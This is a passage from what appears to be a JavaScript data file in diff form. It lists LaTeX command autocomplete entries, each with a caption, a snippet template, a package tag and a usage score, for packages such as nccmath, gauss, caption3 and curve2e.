caption: '\\dots', + snippet: '\\dots', + meta: 'nccmath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'nccmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'nccmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'nccmath-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'nccmath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'nccmath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'nccmath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'nccmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'nccmath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'nccmath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'nccmath-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'nccmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'nccmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'nccmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'nccmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'nccmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'nccmath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'nccmath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'nccmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'nccmath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'nccmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'nccmath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'nccmath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'nccmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'nccmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'nccmath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'nccmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'nccmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'nccmath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'nccmath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'nccmath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'nccmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'nccmath-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'nccmath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'nccmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'nccmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'nccmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'nccmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'nccmath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'nccmath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'nccmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'nccmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'nccmath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'nccmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'nccmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'nccmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'nccmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'nccmath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'nccmath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'nccmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'nccmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'nccmath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'nccmath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'nccmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'nccmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'nccmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'nccmath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'nccmath-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'nccmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'nccmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'nccmath-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'nccmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'nccmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'nccmath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'nccmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'nccmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'nccmath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'nccmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'nccmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'nccmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'nccmath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'nccmath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'nccmath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'nccmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'nccmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'nccmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'nccmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'nccmath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'nccmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'nccmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'nccmath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'nccmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'nccmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'nccmath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'nccmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'nccmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'nccmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'nccmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'nccmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'nccmath-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'nccmath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'nccmath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'nccmath-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'nccmath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'nccmath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'nccmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'nccmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'nccmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'nccmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'nccmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'nccmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'nccmath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'nccmath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'nccmath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'nccmath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'nccmath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'nccmath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nccmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'nccmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'nccmath-cmd', + score: 0.0063276692758974925, + }, + ], + scrtime: [ + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'scrtime-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'scrtime-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'scrtime-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'scrtime-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'scrtime-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scrtime-cmd', + score: 0.00037306820619479756, + }, + ], + luainputenc: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'luainputenc-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'luainputenc-cmd', + score: 0.008565354665444157, + }, + ], + curve2e: [ + { + caption: '\\polyline', + snippet: '\\polyline', + meta: 'curve2e-cmd', + score: 0.00022468880600368487, + }, + { + caption: '\\put', + snippet: '\\put', + meta: 'curve2e-cmd', + score: 0.0406766030275089, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'curve2e-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'curve2e-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'curve2e-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'curve2e-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'curve2e-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'curve2e-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'curve2e-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'curve2e-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\Line', + snippet: '\\Line', + meta: 'curve2e-cmd', + score: 0.0006078790177929149, + }, + { + caption: '\\polygon', + snippet: '\\polygon', + meta: 'curve2e-cmd', + score: 0.0008987552240147395, + }, + { + caption: '\\line', + snippet: '\\line', + meta: 'curve2e-cmd', + score: 0.014519741542622297, + }, + { + caption: '\\polyline', + snippet: '\\polyline', + meta: 'curve2e-cmd', + score: 0.00022468880600368487, + }, + { + caption: '\\vector', + snippet: '\\vector', + meta: 'curve2e-cmd', + score: 0.002970308722584179, + }, + ], + couriers: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'couriers-cmd', + score: 0.00037306820619479756, + }, + ], + caption3: [ + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'caption3-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'caption3-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'caption3-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'caption3-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'caption3-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'caption3-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'caption3-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'caption3-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'caption3-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'caption3-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'caption3-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'caption3-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'caption3-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'caption3-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'caption3-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'caption3-cmd', + score: 0.00037306820619479756, + }, + ], + gauss: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'gauss-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'gauss-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'gauss-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'gauss-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'gauss-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'gauss-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'gauss-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'gauss-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'gauss-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'gauss-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'gauss-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'gauss-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'gauss-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'gauss-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'gauss-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'gauss-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'gauss-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'gauss-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'gauss-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'gauss-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'gauss-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'gauss-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'gauss-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'gauss-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'gauss-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'gauss-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'gauss-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'gauss-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'gauss-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'gauss-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'gauss-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'gauss-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'gauss-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'gauss-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'gauss-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'gauss-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'gauss-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'gauss-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'gauss-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'gauss-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'gauss-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'gauss-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'gauss-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'gauss-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'gauss-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'gauss-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'gauss-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'gauss-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'gauss-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'gauss-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'gauss-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'gauss-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'gauss-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'gauss-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'gauss-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'gauss-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'gauss-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'gauss-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'gauss-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'gauss-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'gauss-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'gauss-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'gauss-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'gauss-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'gauss-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'gauss-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'gauss-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'gauss-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'gauss-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'gauss-cmd', + score: 0.11280487530505384, 